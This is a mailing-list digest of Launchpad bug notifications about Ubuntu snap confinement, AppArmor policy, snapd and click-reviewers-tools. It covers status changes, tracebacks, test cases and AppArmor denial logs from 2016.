Fixed in upstream 0.44. ** Description changed: + + Test Case + $ rm -f ~/.cache/click-reviewers-tools/apparmor-easyprof-ubuntu.json + $ click-review /path/to/click + + + Original description: + WARNING:root:Ignoring missing framework "ubuntu-sdk-15.04" Now executing: click-review ./qsa3.nessita_0.2_all.click Traceback (most recent call last): - File "/usr/bin/click-review", line 162, in - main() - File "/usr/bin/click-review", line 156, in main - results.run_all_checks(overrides) - File "/usr/bin/click-review", line 110, in run_all_checks - self._run_module_checks(module, overrides) - File "/usr/bin/click-review", line 97, in _run_module_checks - review.do_checks() - File "/usr/lib/python3/dist-packages/clickreviews/common.py", line 384, in do_checks - func() - File "/usr/lib/python3/dist-packages/clickreviews/cr_security.py", line 691, in check_policy_groups - if len(policy_groups) < 1: + File "/usr/bin/click-review", line 162, in + main() + File "/usr/bin/click-review", line 156, in main + results.run_all_checks(overrides) + File "/usr/bin/click-review", line 110, in run_all_checks + self._run_module_checks(module, overrides) + File "/usr/bin/click-review", line 97, in _run_module_checks + review.do_checks() + File "/usr/lib/python3/dist-packages/clickreviews/common.py", line 384, in do_checks + func() + File "/usr/lib/python3/dist-packages/clickreviews/cr_security.py", line 691, in check_policy_groups + if len(policy_groups) < 1: TypeError: object of type 'NoneType' has no len() Successfully built package in './qsa3.nessita_0.2_all.click'. This is because clickreviews/apparmor_policy.py has a link to ~click- reviewers instead of ~store-reviewers. This is fixed in r694 ** Changed in: click-reviewers-tools (Ubuntu Yakkety) Status: In Progress => Fix Committed ** Changed in: click-reviewers-tools Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1608943 Title: rename of click-reviewers LP group broke fetch of apparmor json Status in Canonical Click Reviewers tools: Fix Released Status in click-reviewers-tools package in Ubuntu: Fix Committed Status in click-reviewers-tools source package in Xenial: Triaged Status in click-reviewers-tools source package in Yakkety: Fix Committed Bug description: Test Case $ rm -f ~/.cache/click-reviewers-tools/apparmor-easyprof-ubuntu.json $ click-review /path/to/click Original description: WARNING:root:Ignoring missing framework "ubuntu-sdk-15.04" Now executing: click-review ./qsa3.nessita_0.2_all.click Traceback (most recent call last): File "/usr/bin/click-review", line 162, in main() File "/usr/bin/click-review", line 156, in main results.run_all_checks(overrides) File "/usr/bin/click-review", line 110, in run_all_checks self._run_module_checks(module, overrides) File "/usr/bin/click-review", line 97, in _run_module_checks review.do_checks() File "/usr/lib/python3/dist-packages/clickreviews/common.py", line 384, in do_checks func() File "/usr/lib/python3/dist-packages/clickreviews/cr_security.py", line 691, in check_policy_groups if len(policy_groups) < 1: TypeError: object of type 'NoneType' has no len() Successfully built package in './qsa3.nessita_0.2_all.click'. This is because clickreviews/apparmor_policy.py has a link to ~click- reviewers instead of ~store-reviewers. This is fixed in r694 To manage notifications about this bug go to: https://bugs.launchpad.net/click-reviewers-tools/+bug/1608943/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1606277] Re: log-observe interface is broken in latest snap-confine
1.0.38-2 is still affected. Marking as In Progress because the snappy team is working to get 1.0.39 there too. ** Also affects: snap-confine (Ubuntu Yakkety) Importance: Undecided Status: New ** Changed in: snap-confine (Ubuntu Yakkety) Status: New => In Progress -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1606277 Title: log-observe interface is broken in latest snap-confine Status in Snappy Launcher: Fix Released Status in snap-confine package in Ubuntu: In Progress Status in snap-confine source package in Xenial: Fix Committed Status in snap-confine source package in Yakkety: In Progress Bug description: The log-observe interface is broken due to how we handle bind mounts now. This can be seen with 'snappy-debug': $ sudo snap install snappy-debug $ sudo snap connect snappy-debug:log-observe ubuntu-core:log-observe $ sudo /snap/bin/snappy-debug.security scanlog kernel.printk_ratelimit = 0 Traceback (most recent call last): File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 580, in sys.exit(main()) File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 569, in main from_end=opt.only_new) File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 92, in __init__ self.scan_log(log_file, snap_name, follow, from_end) File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 157, in scan_log log = open_file_read(log_file) File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 71, in open_file_read orig = codecs.open(path, 'r', "UTF-8", errors="replace") File "/usr/lib/python3.5/codecs.py", line 895, in open file = builtins.open(filename, mode, buffering) FileNotFoundError: [Errno 2] No such file or directory: '/var/log/syslog' This is because /var/log/syslog is not available at runtime due to the bind mounts. This can be shown by installing hello-world, adjusting /var/lib/snapd/apparmor/profiles/snap.hello-world.sh to have "/**/ r," (to be able to read any directory), reloading the profile, then doing: $ hello-world.sh ... bash-4.3$ ls /var/log/ alternatives.log btmp dpkg.log fsck watchdog bootstrap.log dmesg faillog lastlog wtmp This may also be a problem with other interfaces, I haven't checked extensively, though it seems that /var/lib/extrausers (from the nameservice abstraction) won't work right, and (at least) ppp (/var/log/ppp) and timezone-control (/usr/share/zoneinfo) are also affected. WORKAROUND for snappy-debug: launch outside of the launcher: $ sudo SNAP=/snap/snappy-debug/current PATH=$PATH:/snap/snappy-debug/current/bin /snap/snappy-debug/current/bin/snappy-security scanlog To manage notifications about this bug go to: https://bugs.launchpad.net/snap-confine/+bug/1606277/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1576308] Re: gsettings doesn't work with snap confinement
This is fixed in snapd 2.11+16.10 on Ubuntu 16.10. ** Changed in: snapd (Ubuntu Yakkety) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1576308 Title: gsettings doesn't work with snap confinement Status in snapd package in Ubuntu: Fix Released Status in snapd source package in Xenial: Fix Released Status in snapd source package in Yakkety: Fix Released Bug description: Work is needed there, see https://wiki.ubuntu.com/SecurityTeam/Specifications/ApplicationConfinement#GSettings.2Fdconf To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1576308/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1576308] Re: gsettings doesn't work with snap confinement
This bug is about the security policy related to accessing global gsettings. That policy has been added and is available in 2.0.7 and 2.0.8 is available in xenial-updates now, so marking Fix Released. yakkety is still at 2.0.2 with 2.0.9 in yakkety-proposed so marking Fix Committed. Seb and I discussed on IRC the issue he was facing that prompting the change to the bug status, so reverting his changes. There is work to do for the snap to find the session gsettings files due to how HOME is set, but the security policy allows it now. Please file a new bug if something needs to change in snapd for this issue. Thanks! ** Changed in: snapd (Ubuntu Xenial) Status: Triaged => Fix Released ** Changed in: snapd (Ubuntu Yakkety) Status: Triaged => Fix Committed -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1576308 Title: gsettings doesn't work with snap confinement Status in snapd package in Ubuntu: Fix Committed Status in snapd source package in Xenial: Fix Released Status in snapd source package in Yakkety: Fix Committed Bug description: Work is needed there, see https://wiki.ubuntu.com/SecurityTeam/Specifications/ApplicationConfinement#GSettings.2Fdconf To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1576308/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1588886] Re: no indication that a user needs to connect the home Plug to the home Slot to make a snap access files in the homedir
This is fixed in 2.0.7 so marking upstream task as Fix Released. snapd 2.0.8 is in yakkety-proposed so marking it as Fix Committed. Marking xenial as 'verification-done' based on reporter's feedback. ** Tags removed: verification-needed ** Tags added: verification-done ** Changed in: snapd (Ubuntu) Status: New => Fix Committed ** Changed in: snappy Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/156 Title: no indication that a user needs to connect the home Plug to the home Slot to make a snap access files in the homedir Status in Snappy: Fix Released Status in snapd package in Ubuntu: Fix Committed Status in snapd source package in Xenial: Fix Committed Bug description: Krita snap, can't save/load images outside confinement ~/snap/krita tried to load an image from my desktop but i get an error message To manage notifications about this bug go to: https://bugs.launchpad.net/snappy/+bug/156/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1580463] Re: Snap blocks access to system input methods (ibus, fctix, ...)
** Also affects: apparmor (Ubuntu) Importance: Undecided Status: New ** Changed in: apparmor (Ubuntu Xenial) Status: New => Triaged ** Changed in: apparmor (Ubuntu Yakkety) Status: New => In Progress ** Changed in: apparmor (Ubuntu Xenial) Importance: Undecided => Medium ** Changed in: apparmor (Ubuntu Yakkety) Importance: Undecided => Medium ** Changed in: apparmor (Ubuntu Xenial) Assignee: (unassigned) => Tyler Hicks (tyhicks) ** Changed in: apparmor (Ubuntu Yakkety) Assignee: (unassigned) => Tyler Hicks (tyhicks) -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1580463 Title: Snap blocks access to system input methods (ibus, fctix, ...) Status in apparmor package in Ubuntu: In Progress Status in im-config package in Ubuntu: Fix Released Status in snapd package in Ubuntu: Confirmed Status in apparmor source package in Xenial: Triaged Status in im-config source package in Xenial: In Progress Status in snapd source package in Xenial: New Status in apparmor source package in Yakkety: In Progress Status in im-config source package in Yakkety: Fix Released Status in snapd source package in Yakkety: Confirmed Bug description: = SRU im-config = [Impact] ibus-daemon by default uses a unix socket name of /tmp/dbus-... that is indistinguishable from dbus-daemon abstract sockets. While dbus-daemon has AppArmor mediation, ibus-daemon does not so it is important that its abstract socket not be confused with dbus-daemon's. By modifying ibus-daemon's start arguments to use "--address 'unix:tmpdir=/tmp/ibus'" AppArmor can continue mediating DBus abstract sockets like normal and also mediate access to the ibus-daemon-specific abstract socket via unix rules. This also tidies up the abstract socket paths so that it is clear which are for ibus-daemon, which for dbus-daemon, etc. The upload simply adjusts 21_ibus.rc to start ibus-daemon with "-- address 'unix:tmpdir=/tmp/ibus'" and adds a comment. No compiled code changes are required. [Test Case] 1. start a unity session before updating to the package in -proposed 2. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0 IBUS_ADDRESS=unix:abstract=/tmp/dbus-Vyx8fGFA,guid=28e8e7e89f902c8d4e9d77c5557add76 3. $ lsof -p $(pidof ibus-daemon) | grep '/dbus' ibus-daem 2973 jamie8u unix 0x 0t0 29606 @/tmp/dbus-oxKYpN30 type=STREAM 4. update the package in -proposed and perform '2' and '3'. The IBUS_ADDRESSES should be the same as before 5. logout of unity, then log back in 6. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0 IBUS_ADDRESS=unix:abstract=/tmp/ibus/dbus-SpxOl8Fc,guid=06d4bbeb07614c6dffbf221c57473f4e (notice '/tmp/ibus/' in the path) 7. $ lsof -p $(pidof ibus-daemon) | grep '/dbus' ibus-daem 3471 jamie8u unix 0x 0t0 26107 @/tmp/ibus/dbus-SpxOl8Fc type=STREAM ... (notice '@/tmp/ibus/' in the path) In addition to the above, you can test for regressions by opening 'System Settings' under the 'gear' icon in the panel and selecting 'Text Entry'. From there, add an input source on the right, make sure 'Show current input source in the menu bar' is checked, then use the input source panel indicator to change input sources. [Regression Potential] The regression potential is considered low because there are no compiled code changes and because the changes only occur after ibus- daemon is restarted, which is upon session start, not package upgrade. When it is restarted, the files in ~/.config/ibus/bus/*-unix-0 are updated accordingly for other applications to pick up. This change intentionally requires a change to the unity7 snapd interface, which is in progress. Currently the change should not regress snapdsbehavior due to other issues surrounding using ibus unrelated to security policy. = Original description = Currently snaps can't access ibus/fcitx from the system, do we need a interface for input methods there? To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1580463/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1580463] Re: Snap blocks access to system input methods (ibus, fctix, ...)
** Also affects: snapd (Ubuntu Yakkety) Importance: Medium Status: Incomplete ** Also affects: snapd (Ubuntu Xenial) Importance: Undecided Status: New ** Also affects: im-config (Ubuntu) Importance: Undecided Status: New ** Changed in: im-config (Ubuntu Yakkety) Status: New => In Progress ** Changed in: im-config (Ubuntu Yakkety) Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1580463 Title: Snap blocks access to system input methods (ibus, fctix, ...) Status in im-config package in Ubuntu: In Progress Status in snapd package in Ubuntu: Incomplete Status in im-config source package in Xenial: New Status in snapd source package in Xenial: New Status in im-config source package in Yakkety: In Progress Status in snapd source package in Yakkety: Incomplete Bug description: Currently snaps can't access ibus/fcitx from the system, do we need a interface for input methods there? To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/im-config/+bug/1580463/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1572140] Re: click-reviewers-tools don't know opengl interface
Verified that opengl is now recognized: - lint-snap-v2:plugs:opengl:opengl OK ** Changed in: click-reviewers-tools Status: Fix Committed => Fix Released ** Also affects: click-reviewers-tools (Ubuntu) Importance: Undecided Status: New ** Also affects: click-reviewers-tools (Ubuntu Yakkety) Importance: Undecided Status: New ** Also affects: click-reviewers-tools (Ubuntu Xenial) Importance: Undecided Status: New ** Changed in: click-reviewers-tools (Ubuntu Xenial) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: click-reviewers-tools (Ubuntu Yakkety) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: click-reviewers-tools (Ubuntu Yakkety) Status: New => Fix Released ** Changed in: click-reviewers-tools (Ubuntu Xenial) Status: New => Fix Committed ** Tags removed: verification-needed ** Tags added: verification-done -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1572140 Title: click-reviewers-tools don't know opengl interface Status in Canonical Click Reviewers tools: Fix Released Status in click-reviewers-tools package in Ubuntu: Fix Released Status in click-reviewers-tools source package in Xenial: Fix Committed Status in click-reviewers-tools source package in Yakkety: Fix Released Bug description: click-reviewers-tools don't know opengl interface - check ubuntu- clock-app in the store. To manage notifications about this bug go to: https://bugs.launchpad.net/click-reviewers-tools/+bug/1572140/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1580819] Re: Add support for confinement property
Verified that 'confinement: strict' properly errors with 'plugs: [ network-control ]': Errors -- - security-snap-v2:plug_safe:network-control:network-control reserved interface 'network-control' for vetted applications only and that 'confinement: devmode' shows no error with 'plugs: [ network- control ]' ** Also affects: click-reviewers-tools (Ubuntu) Importance: Undecided Status: New ** Changed in: click-reviewers-tools (Ubuntu Yakkety) Status: New => Fix Released ** Changed in: click-reviewers-tools (Ubuntu Xenial) Status: New => Fix Committed ** Changed in: click-reviewers-tools (Ubuntu Xenial) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: click-reviewers-tools (Ubuntu Yakkety) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Tags removed: verification-needed ** Tags added: verification-done -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1580819 Title: Add support for confinement property Status in Canonical Click Reviewers tools: Fix Released Status in Snapcraft: Fix Committed Status in click-reviewers-tools package in Ubuntu: Fix Released Status in snapcraft package in Ubuntu: Fix Released Status in click-reviewers-tools source package in Xenial: Fix Committed Status in snapcraft source package in Xenial: Fix Committed Status in click-reviewers-tools source package in Yakkety: Fix Released Status in snapcraft source package in Yakkety: Fix Released Bug description: [Impact] * Snaps need to be able to specify if they require devmode or if they can be run confined. This will allow for snapd to provide reasonable errors if one tries to install a snap that cannot run successfully under confinement. * The YAML property should be called "confinement," and it should have two options: "devmode" and "strict." It should be optional, and `snapcraft init` should set it to "devmode." * The "confinement" YAML property should be copied into the resulting `snap.yaml`. * Example YAML: name: foo version: 1 summary: foo description: foo confinement: devmode parts: foo: plugin: nil [Test Case] * Run `snapcraft init`. Make sure "confinement" is "devmode." * Create a valid snapcraft.yaml and run `snapcraft` on it. Make sure the "confinement" value gets copied to the `snap.yaml`. * Create a valid snapcraft.yaml and remove the "confinement" property. Run `snapcraft`. It should print a hint about defaulting to "strict", and "confinement: strict" should be in the resulting `snap.yaml`. [Regression Potential] * snapcraft.yaml validation could be incorrect (required properties may not be required correctly, etc.) To manage notifications about this bug go to: https://bugs.launchpad.net/click-reviewers-tools/+bug/1580819/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1583298] Re: Add support for epoch property
$ click-review -v /tmp/foo_1.0_amd64.snap ... - lint-snap-v2:epoch_valid OK $ cat meta/snap.yaml apps: bar: command: bin/bar architectures: - amd64 description: 'stuff here' name: foo plugs: opengl: null pulseaudio: null unity7: null summary: stuff version: 1.0 epoch: 2 ** Tags removed: verification-needed ** Tags added: verification-done ** Also affects: snapd (Ubuntu Yakkety) Importance: Wishlist Assignee: Kyle Fazzari (kyrofa) Status: Fix Committed ** Also affects: snapd (Ubuntu Xenial) Importance: Undecided Status: New ** Also affects: click-reviewers-tools (Ubuntu) Importance: Undecided Status: New ** Changed in: click-reviewers-tools (Ubuntu Yakkety) Status: New => Fix Released ** Changed in: click-reviewers-tools (Ubuntu Xenial) Status: New => Fix Committed ** Changed in: click-reviewers-tools (Ubuntu Yakkety) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: click-reviewers-tools (Ubuntu Xenial) Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1583298 Title: Add support for epoch property Status in click-reviewers-tools package in Ubuntu: Fix Released Status in snapd package in Ubuntu: Fix Committed Status in click-reviewers-tools source package in Xenial: Fix Committed Status in snapd source package in Xenial: New Status in click-reviewers-tools source package in Yakkety: Fix Released Status in snapd source package in Yakkety: Fix Committed Bug description: In order to support step upgrades, snaps need to be able to specify upgrade paths. The method decided upon to specify said upgrade paths is an optional "epoch" property. Valid values consist of positive integers and an asterisk (e.g. 1 is epoch 1, 1* is the upgrade path from 1 to 2, and 2 is epoch 2). If the epoch is not specified, it should implicitly be 0. Example YAML: name: foo version: 1 description: foo summary: foo epoch: 1* Note that the API for providing this to the store does not yet exist, so this bug only covers the parsing of this information from the `snap.yaml`. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/click-reviewers-tools/+bug/1583298/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1584231] Re: update to 0.43 (aka, support 'confinement' field in snap v2 yaml)
This was fixed in yakkety in 0.43. ** Changed in: click-reviewers-tools (Ubuntu Yakkety) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1584231 Title: update to 0.43 (aka, support 'confinement' field in snap v2 yaml) Status in click-reviewers-tools package in Ubuntu: Fix Released Status in click-reviewers-tools source package in Xenial: In Progress Status in click-reviewers-tools source package in Yakkety: Fix Released Bug description: [Impact] Upgrade to review tools 0.43. The review tools provide lint-style checks for clicks and snaps. This release has several bug fixes and support for new snappy yaml declarations, the most important of which is supporting the 'confinement' property. Here is the complete changelog: * sr_lint.py: - kernel snaps may have external symlinks - handle top-level plugs and slots with yaml data as 'null' (LP: #1579201) - add epoch checks (LP: #1583298) - .pyc are arch-independent, so don't complain about them - add confinement checks (LP: #1580819) * data/apparmor-easyprof-ubuntu.json: - add opengl interface as 'common' (LP: #1572140) - add reserved bluez, network-manager and location-observe interfaces * sr_security.py: - remove last reference to 'cap' - turn resquash test into info for now until the squashfs-tools bugs are fixed and this is a reliable check * when 'confinement' is 'devmode', override the result type to 'info' - common.py: add override_result_type to allow in support of 'confinement' overrides - sr_common.py: add _devmode_override() - sr_security.py: use override_result_type if in devmode - LP: #1584231 [Test Case] The testsuite tests the above and the store is already using these checks. To verify the package: 1. install the package 2. verify click reviews work with: click-review /path/to/click 3. verify snapv1 reviews work with: click-review /path/to/15.04/snap 4. verify snapv2 reviews work with: click-review /path/to/16/snap [Regression Potential] The worst regression is that the lint tool would trace back to the user running it instead of displaying the information. The testsuite is run during the build and is comprehensive with the added code maintaining 100% coverage for sr_security.py and sr_lint.py. sr_common.py maintaining 98% coverage. [Other Info] The store has been running r651 for weeks with no issues. r652 and later are to support the new snappy 'confinement' and 'epoch' fields as per the spec and fixes a few minor issues. The store will land this next week and if there are regressions there, I will update this bug. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/click-reviewers-tools/+bug/1584231/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1574556] Re: apparmor denials reported for encryped HOME
This was fixed in yakkety-- not sure why it wasn't auto-closed. ubuntu-core-launcher (1.0.29) yakkety; urgency=medium * debian/usr.bin.ubuntu-core-launcher: add workaround rules for ecryptfs until the upcoming kernel fix lands everywhere (LP: #1574556) ** Changed in: ubuntu-core-launcher (Ubuntu) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1574556 Title: apparmor denials reported for encryped HOME Status in Snappy: Triaged Status in ubuntu-core-launcher package in Ubuntu: Fix Released Status in ubuntu-core-launcher source package in Xenial: Triaged Bug description: I just did a fresh install of Ubuntu 16.04 with encrypted $HOME. I've installed my links snap and it seems to work but I see odd apparmor denials in syslog: abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhjlvT8DEXMHHv0WTtxJ7vh---/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhjlvT8DEXMHHv0WTtxJ7vh---/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfh5TefvZX.jl5R9fjgnc45G---/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhjlvT8DEXMHHv0WTtxJ7vh---/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfh5TefvZX.jl5R9fjgnc45G---/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhJJq4TueYwFMXoSVrZyfk0E--/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 abr 25 12:09:25 vm kernel: audit_printk_skb: 36 callbacks suppressed To manage notifications about this bug go to: https://bugs.launchpad.net/snappy/+bug/1574556/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1573188] Re: unity7 interface doesn't cover indicators or notifications
The fix for this is in 2.0.5 so closing the upstream task. ** Changed in: snappy Status: In Progress => Fix Released ** Changed in: snapd (Ubuntu Xenial) Importance: Undecided => High ** Changed in: snapd (Ubuntu) Importance: Undecided => High -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1573188 Title: unity7 interface doesn't cover indicators or notifications Status in Snappy: Fix Released Status in snapd package in Ubuntu: Fix Committed Status in snapd source package in Xenial: Fix Committed Bug description: Using the "unity7" interface, it seems that the access required to utilize indicators or display notifications is not granted (note that installing with --devmode works). To duplicate: 1) Build/install the Qt systray example snap here: https://github.com/kyrofa/qt-example-snaps/tree/master/systray 2) Install without devmode, e.g. sudo snap install systray_1_amd64.snap 3) Launch from the terminal with the `systray` command. 4) Click "Show Message". 5) Note the presence of a launcher icon, the lack of an indicator, and a very ugly notification, like this: http://pasteboard.co/nF8fKsP.png 6) Uninstall the snap: sudo snap remove systray 7) Install the snap with devmode, e.g. sudo snap install --devmode systray_1_amd64.snap 8) Launch from the terminal again. 9) Click "Show Message". 10) Note the presence of a launcher icon, the presence of an indicator (with a broken icon, but that may be a different issue), and a pretty notification, like this: http://pasteboard.co/nFoPlFh.png To manage notifications about this bug go to: https://bugs.launchpad.net/snappy/+bug/1573188/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1574556] Re: apparmor denials reported for encryped HOME
** Changed in: ubuntu-core-launcher (Ubuntu) Status: Fix Released => Fix Committed -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1574556 Title: apparmor denials reported for encryped HOME Status in Snappy: Triaged Status in ubuntu-core-launcher package in Ubuntu: Fix Committed Status in ubuntu-core-launcher source package in Xenial: Triaged Bug description: I just did a fresh install of Ubuntu 16.04 with encrypted $HOME. I've installed my links snap and it seems to work but I see odd apparmor denials in syslog: abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" name="/home/.ecryptfs/zyga/.Private/ECRYPTFS_FNEK_ENCRYPTED.FWZP03VlehQiTEQUSfHv7QCD3zeqlxOc9gfhjlvT8DEXMHHv0WTtxJ7vh---/" pid=2128 comm="ubuntu-core-lau" requested_mask="wr" denied_mask="wr" fsuid=1000 ouid=1000 abr 25 12:09:25 vm audit[2128]: AVC apparmor="DENIED" operation="open" profile="/usr/bin/ubuntu-core-launcher" 